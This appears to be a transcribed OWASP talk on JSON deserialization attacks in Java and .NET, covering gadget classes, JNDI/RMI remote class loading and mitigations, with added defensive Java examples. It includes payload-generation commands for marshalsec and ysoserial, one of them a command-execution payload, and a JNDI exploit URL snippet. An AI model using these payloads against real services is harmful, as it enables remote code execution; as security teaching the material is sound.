Json Deserialization Exploitation - OWASP

Transcription

Json Deserialization Exploitation
RCE by Design
1 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Contents
1. Introduction
2. Basics
3. Exploitation
4. Summary / Further Research

Introduction
- DefCon 2017: "Friday the 13th: JSON Attacks" [1]
- Slides quite rightly point out: 2016 was the "year of Java Deserialization apocalypse"
- In the age of RESTful APIs and microservice architecture, the transmission of objects shifts to a JSON or XML serialized form
- Usage of JSON or XML more secure?

Introduction
- Moritz Bechler published a paper about deserialization vulnerabilities (focused on Java JSON and XML) [5]
- .Net serialization libraries are affected as well [6]
- OWASP Top 10 2017 RC2 [7] ranked insecure deserialization in eighth place

Basics
Dummy.json
{"id": 1338, "object": "Test"}

    import com.fasterxml.jackson.core.JsonParser;
    import com.fasterxml.jackson.databind.ObjectMapper;
    import java.io.IOException;

    // interface default method as shown on the slide
    default <T> T parseJackson(Class<T> clazz, String json) throws IOException {
        ObjectMapper mapper = new ObjectMapper()
                .configure(JsonParser.Feature.ALLOW_UNQUOTED_FIELD_NAMES, true);
        T object = mapper.readValue(json, clazz);
        return object;
    }

    public class Dummy {
        public int id;
        public Object object;   // untyped field: whatever JSON value arrives is bound here
        public int getId() {
            return id;
        }
    }
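The untyped Object field on the slide is what makes polymorphic (type-id driven) deserialization reachable once default typing is switched on. As an added example, not code from the slides or from marshalsec, the same Dummy shape is parsed by a mapper that keeps polymorphic typing but restricts it to one allowlisted application type. It assumes Jackson 2.10 or newer (BasicPolymorphicTypeValidator and activateDefaultTyping); the Note class and the sample payloads are constructed for the example.

```java
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

import java.io.IOException;

public class AllowlistedTyping {

    // Same shape as the slide's Dummy: the Object field is where a type id
    // supplied by the client would be honoured.
    public static class Dummy {
        public int id;
        public Object object;
    }

    // Hypothetical application type that the service does want to accept.
    public static class Note {
        public String text;
    }

    // Hardened mapper: polymorphic typing applies to Object / non-concrete
    // declared types only, and the validator accepts Note and nothing else.
    public static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType(Note.class)
                .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv,
                ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE,
                JsonTypeInfo.As.WRAPPER_ARRAY);
        return mapper;
    }

    // Returns the parsed Dummy, or null when Jackson refused the type id.
    public static Dummy parse(String json) throws IOException {
        try {
            return hardenedMapper().readValue(json, Dummy.class);
        } catch (JsonMappingException e) {
            // InvalidTypeIdException lands here: the validator denied the class,
            // so no constructor or setter of that class was ever invoked.
            System.err.println("rejected: " + e.getOriginalMessage());
            return null;
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample payloads. WRAPPER_ARRAY puts the type id into the
        // first element of a two-element array around the value.
        String accepted = "{\"id\":1338,\"object\":[\"" + Note.class.getName()
                + "\",{\"text\":\"hello\"}]}";
        String denied = "{\"id\":1338,\"object\":[\"java.util.HashMap\",{}]}";

        Dummy ok = parse(accepted);
        System.out.println("accepted -> " + ((Note) ok.object).text);
        System.out.println("denied   -> " + parse(denied));
    }
}
```

The deny decision is taken before the named class is instantiated, which is the property a defender wants: a type id that is not on the allowlist never reaches a constructor, setter or any of the gadget classes listed later in the deck.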

Basics
- JSON marshallers should be able to reconstruct the object using the details present in the JSON data
- The unmarshaller creates a new object (allocates space in memory) using the default (parameterless) constructor, then uses reflection to populate all fields or property members
- JSON libraries need to reconstruct objects by either:
  - calling the default constructor and using reflection to set field values
  - calling the default constructor and calling setters to set field values
  - calling "special" constructors, type converters or callbacks
  - calling common methods such as hashCode(), toString(), equals(), finalize(), ...

Basics
- JSON libraries invoke setters to populate object fields
- [5] and [6] focused their analysis on finding types with setters that could lead to arbitrary code execution (Java & .Net)

Basics
- …son
- Genson
- JSON-IO
- FlexSON
- SnakeYAML (YAML)
- jYAML (YAML)
- YamlBeans (YAML)
- Apache Flex BlazeDS (AMF4)
- Red5 IO AMF (AMF)
- Castor (XML)
- Java XMLDecoder (XML)
- Java Serialization (binary)
- Kryo (binary)
- Hessian/Burlap
- …tream (XML/various)
- Java XML/various

Basics – GADGETs/Payload
- Bean property based marshallers: gadgets call setter methods, which means that far more code can be triggered directly during unmarshalling
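To make the reconstruction mechanisms from the Basics slide and the point about setters concrete, here is an added example (not code from the slides) that records exactly which application code Jackson runs while rebuilding an object: the bean path (default constructor plus setter), the reflection path (fields written directly, setters never called), and the "special constructor" path via @JsonCreator. The BySetter and ByCreator classes and the sample document are constructed for the example; the Jackson calls are the standard 2.x API.

```java
import com.fasterxml.jackson.annotation.JsonAutoDetect;
import com.fasterxml.jackson.annotation.JsonCreator;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.PropertyAccessor;

import java.util.ArrayList;
import java.util.List;

public class UnmarshalTrace {

    // Every constructor or setter that runs while Jackson rebuilds an object
    // appends a line here, so the trace shows which application code executed.
    public static final List<String> TRACE = new ArrayList<>();

    // Bean-style type: default constructor, then one setter per property.
    public static class BySetter {
        private String path;

        public BySetter() {
            TRACE.add("BySetter.<init>");
        }

        public void setPath(String p) {
            // Whatever logic lives in a setter executes during unmarshalling;
            // this is the hook the gadget classes on the next slide abuse.
            TRACE.add("BySetter.setPath(" + p + ")");
            this.path = p;
        }

        public String getPath() {
            return path;
        }
    }

    // "Special" constructor: Jackson passes the JSON values straight in.
    public static class ByCreator {
        private final String path;

        @JsonCreator
        public ByCreator(@JsonProperty("path") String p) {
            TRACE.add("ByCreator.<init>(" + p + ")");
            this.path = p;
        }

        public String getPath() {
            return path;
        }
    }

    // Mapper that never calls setters: properties are written by reflection
    // directly into fields (the first mechanism on the Basics slide).
    public static ObjectMapper fieldOnlyMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.setVisibility(PropertyAccessor.SETTER, JsonAutoDetect.Visibility.NONE);
        mapper.setVisibility(PropertyAccessor.FIELD, JsonAutoDetect.Visibility.ANY);
        return mapper;
    }

    // Deserialises one document and returns the list of code that ran.
    public static List<String> trace(ObjectMapper mapper, Class<?> type, String json)
            throws Exception {
        TRACE.clear();
        mapper.readValue(json, type);
        return new ArrayList<>(TRACE);
    }

    public static void main(String[] args) throws Exception {
        String json = "{\"path\":\"/tmp/x\"}";   // constructed sample input

        // default mapper: constructor, then setter
        System.out.println(trace(new ObjectMapper(), BySetter.class, json));
        // field-only mapper: constructor only, the field is set by reflection
        System.out.println(trace(fieldOnlyMapper(), BySetter.class, json));
        // creator: the annotated constructor receives the value directly
        System.out.println(trace(new ObjectMapper(), ByCreator.class, json));
    }
}
```

The second run is the one worth noting from a hardening angle: with setter visibility switched off, the setter body is simply not on the path, so a mapper configured for field access exposes less application code to attacker-controlled input than a bean-property mapper does.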

Basics – Gadgets
- …util.ServiceLoader
- …onImpl
- javax.imageio.ImageIO
- ContainsFilter
- Commons Configuration JNDIConfiguration
- C3P0 JndiRefForwardingDataSource
- C3P0 WrapperConnectionPoolDataSource
- Spring Beans PropertyPathFactoryBean
- Spring AOP PartiallyComparableAdvisorHolder
- Spring AOP AbstractBeanFactoryPointcutAdvisor
- Spring DefaultListableBeanFactory
- Apache XBean
- Caucho Resin
- javax.script.ScriptEngineManager
- Commons Beanutils BeanComparator
- ROME EqualsBean/ToStringBean
- Groovy
- java.rmi.server.UnicastRemoteObject

Exploitation
- Moritz Bechler published a payload generator based on his previous work: https://github.com/mbechler/marshalsec/
- Payload generation via marshalsec:
    java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Jackson -a -v
    java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.JsonIO -a -v

Exploitation
- Payload generation via marko-marshal [8]:
    URI jndiUrl = new URI("rmi://localhost:1069/Exploit");
    Configuration c = …table("C:\\Windows\\notepad.exe", y).build();
    MarshalsecFactory factory = new MarshalsecFactory(c);
    List<MarshalPayloads> allPayloads = factory.allPayloads();
    allPayloads.forEach(payload -> System.out.println(payload));

Exploitation – JNDI Exploitation – Basics
- JNDI is the Java interface to interact with Naming and Directory Services
- It offers a single common interface to interact with disparate naming and directory services such as Remote Method Invocation (RMI), Lightweight Directory Access Protocol (LDAP), Active Directory, Domain Name System (DNS), Common Object Request Broker Architecture (CORBA), etc.

Exploitation – JNDI Exploitation – Basics [9]
- The Java Virtual Machine (JVM) allows loading of custom classes from a remote source without any restrictions

Exploitation – RMI Exploitation [9] - Java remote method invocation

Exploitation – RMI Exploitation – Limitation
- Java 8u121 finally added a restriction on loading classes from a remote codebase, but only for RMI at this point

Exploitation – DEMO TIME [10]

Exploitation
- All serializers need to reconstruct objects and will normally invoke methods
- The problem is not limited to Java (e.g. BinaryFormatter in .Net):
    ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -base64 -c "ping 10.0.0.19" > execute-ping.txt
  Source: …emote-code-execution

Summary / Further Work
- JSON is not safe
- Security by design: identify the use of known vulnerable components, e.g. https://www.cvedetails.com/cve/CVE-2017-9805/
- Other libraries? (Vert.x)
- Burp plugin (Burp Collaborator)

Summary / Further Work
- ? One year later [11]: published 07 June 2018, https://github.com/nccgroup/freddy

Summary / Further Work
- JSON is not safe
- Other libraries? (Vert.x)
- Pentest view? BOSCH & AXA
- Burp plugin (Burp Collaborator)

Summary / Further Work
- Notable exceptions without this kind of behavior:
  - JAXB implementations generally require that all types used are registered.
  - Mechanisms that require schema definitions or compilation (e.g. XmlBeans, Jibx, Protobuf).
  - GSON requires specifying a root type, honors property types, and its mechanism for polymorphism requires registration.
  - GWT-RPC generally does use supplied type information, but automatically builds a whitelist.

FIN

References
[1] …tacks.pdf
[2] …ns/file…ava-endpoints.pdf
[3] https://github.com/frohoff/ysoserial
[4] …ckles/
[5] …/marshalsec.pdf
[6] …-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
[7] …/OWASP%20Top%2010%202017%20RC2%20Final.pdf
[8] https://github.com/no-sec-marko/marshalsec
[9] …8F%8A%E5%88%A9%E7%94%A8/
[10] …lities
[11] …n-killer/